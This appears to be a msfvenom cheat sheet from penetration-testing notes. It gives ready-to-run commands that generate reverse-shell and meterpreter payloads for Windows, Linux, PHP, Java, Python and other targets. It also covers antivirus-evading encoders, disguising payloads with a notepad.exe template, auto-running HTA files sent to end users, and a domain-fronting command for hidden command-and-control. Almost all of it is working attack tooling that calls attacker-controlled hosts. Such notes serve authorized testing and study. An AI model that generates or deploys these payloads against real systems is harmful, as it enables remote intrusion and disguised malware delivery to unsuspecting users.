Command Example
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.172 LPORT=443 EXITFUNC=thread -f aspx -o iistest.aspx
General Flags
Encoders
-e x86/shikata_ga_nai
-e x64/zutto_dekiru
Templates
Use a locally saved exe file as a template. The output will share the template's thumbnail image, metadata, etc.
-x notepad.exe
Available Payloads
Windows
Payloads
Note: All payloads with x64 are 64-bit; all without are 32-bit.
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
Formats
Compiled
EXE: -f exe -o test.exe
This is a directly executable binary.
ASP: -f asp -o iistest.asp
Mostly used for IIS Web servers.
ASPX: -f aspx -o iistest.aspx
Also mostly used for IIS Web servers.
HTA: -f hta-psh -o file.hta
An HTA file sent to an end user will auto-run when they open it.
DLL: -f dll -o file.dll
Used when implementing DLL injection.
Raw
C#: -f csharp
Used to embed the shellcode in C# code, usually when building a malicious DLL or binary in Visual Studio and then passing it to DotNetToJScript.
PS: -f powershell
Used when placing shellcode directly in a .ps1 script, usually with a macro runner.
Linux
Payloads
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/meterpreter/reverse_tcp
Formats
ELF: -f elf -o file
Script Language Payloads
Python
msfvenom -p python/meterpreter/reverse_https LHOST=192.168.49.205 LPORT=443 -f raw > met.py
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
Java
Payloads
java/jsp_shell_reverse_tcp
Formats
WAR: -f war > shell.war
JavaScript
Payloads
linux/x86/shell_reverse_tcp
windows/x64/shell_reverse_tcp
Formats
JS_LE: CMD=/bin/bash -f js_le -e generic/none
Command Example
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.205 LPORT=443 CMD=/bin/bash -f js_le -e generic/none
PHP
Payloads
php/shell_reverse_tcp
Formats
PHP: -f raw > shell.php
Domain Fronting
msfvenom -p windows/x64/meterpreter_reverse_https HttpHostHeader=cdn123.offseccdn.com LHOST=good.com LPORT=443 -f exe > https-df.exe
The above probably isn't useful anymore, since Azure, the only cloud provider that supported this type of attack, killed it in March 2021.